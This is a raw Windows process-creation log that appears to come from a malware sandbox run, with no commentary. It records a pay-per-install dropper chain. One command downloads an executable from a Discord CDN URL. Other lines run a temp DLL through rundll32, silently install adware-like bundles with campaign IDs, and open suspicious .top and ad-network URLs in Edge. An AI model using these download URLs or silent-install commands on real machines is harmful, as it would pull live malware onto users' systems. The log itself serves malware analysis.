"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 6556 -ip 6556
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4940 -ip 4940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 1212 -ip 1212
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4940 -s 236
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 2404
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\3285.tmp\3286.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\3285.tmp\3286.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Users\Admin\AppData\Local\Temp\11708\DES6_6_6.exe
DES6_6_6.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 456
C:\Users\Admin\AppData\Local\Temp\is-6136Q.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-6136Q.tmp\Setup.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 1248 -ip 1248
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\AppData\Local\Temp\3285.tmp\3286.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\3285.tmp\3286.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449&param=721
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e4,0x1e8,0x1ec,0x174,0x1f0,0x7ffb4afa46f8,0x7ffb4afa4708,0x7ffb4afa4718
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 624 -p 1580 -ip 1580
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A79D56B9BEAC24017639E7F7F8D28B0D C
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2668 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1580 -s 2456
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
C:\Users\Admin\Documents\VbXarXO5zyG5V2w41wcfJHxe.exe
"C:\Users\Admin\Documents\VbXarXO5zyG5V2w41wcfJHxe.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
C:\Users\Admin\Documents\VbXarXO5zyG5V2w41wcfJHxe.exe
"C:\Users\Admin\Documents\VbXarXO5zyG5V2w41wcfJHxe.exe"
C:\Users\Admin\Documents\VbXarXO5zyG5V2w41wcfJHxe.exe
"C:\Users\Admin\Documents\VbXarXO5zyG5V2w41wcfJHxe.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1
C:\Users\Admin\Documents\VbXarXO5zyG5V2w41wcfJHxe.exe
"C:\Users\Admin\Documents\VbXarXO5zyG5V2w41wcfJHxe.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 3992 -ip 3992
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 2412
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4452 /prefetch:8
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3324 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3324 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4afa46f8,0x7ffb4afa4708,0x7ffb4afa4718
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x5uykbnn.ala\GcleanerEU.exe /eufive & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\20itkg2t.ljt\installer.exe /qn CAMPAIGN="654" & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6064 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ylscw1iv.fs4\ufgaa.exe & exit
C:\Users\Admin\AppData\Local\Temp\x5uykbnn.ala\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\x5uykbnn.ala\GcleanerEU.exe /eufive
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7354aa5a-dfe8-3d4c-87a9-e879acaf3f1e}\oemvista.inf" "9" "4d14a44ff" "000000000000010C" "WinSta0\Default" "0000000000000158" "208" "c:\program files (x86)\maskvpn\driver\win764"
C:\Users\Admin\AppData\Local\Temp\20itkg2t.ljt\installer.exe
C:\Users\Admin\AppData\Local\Temp\20itkg2t.ljt\installer.exe /qn CAMPAIGN="654"
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000010C" "f1d4"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 8380 -ip 8380
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\242k4w3k.v2x\anyname.exe & exit
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8380 -s 276
C:\Users\Admin\AppData\Local\Temp\242k4w3k.v2x\anyname.exe
C:\Users\Admin\AppData\Local\Temp\242k4w3k.v2x\anyname.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5qzk3i3y.lne\gcleaner.exe /mixfive & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A828F1660D402C964DCF5693FBD0F34E C
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xj1zg1zv.3gu\autosubplayer.exe /S & exit
C:\Users\Admin\AppData\Local\Temp\242k4w3k.v2x\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\242k4w3k.v2x\anyname.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 3976 -ip 3976
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\5qzk3i3y.lne\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\5qzk3i3y.lne\gcleaner.exe /mixfive
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 6356 -ip 6356
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6356 -s 272
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\20itkg2t.ljt\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\20itkg2t.ljt\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5312 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_E63C.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1d0,0x210,0x7ffb62c4dec0,0x7ffb62c4ded0,0x7ffb62c4dee0
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff619c19e70,0x7ff619c19e80,0x7ff619c19e90
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1736,14023596039133343380,15699115564314849634,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8640_2014394801" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1752 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1736,14023596039133343380,15699115564314849634,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8640_2014394801" --mojo-platform-channel-handle=2084 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1736,14023596039133343380,15699115564314849634,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8640_2014394801" --mojo-platform-channel-handle=1800 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1736,14023596039133343380,15699115564314849634,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8640_2014394801" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2384 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1736,14023596039133343380,15699115564314849634,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8640_2014394801" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2188 /prefetch:1
C:\Windows\system32\DllHost.exe
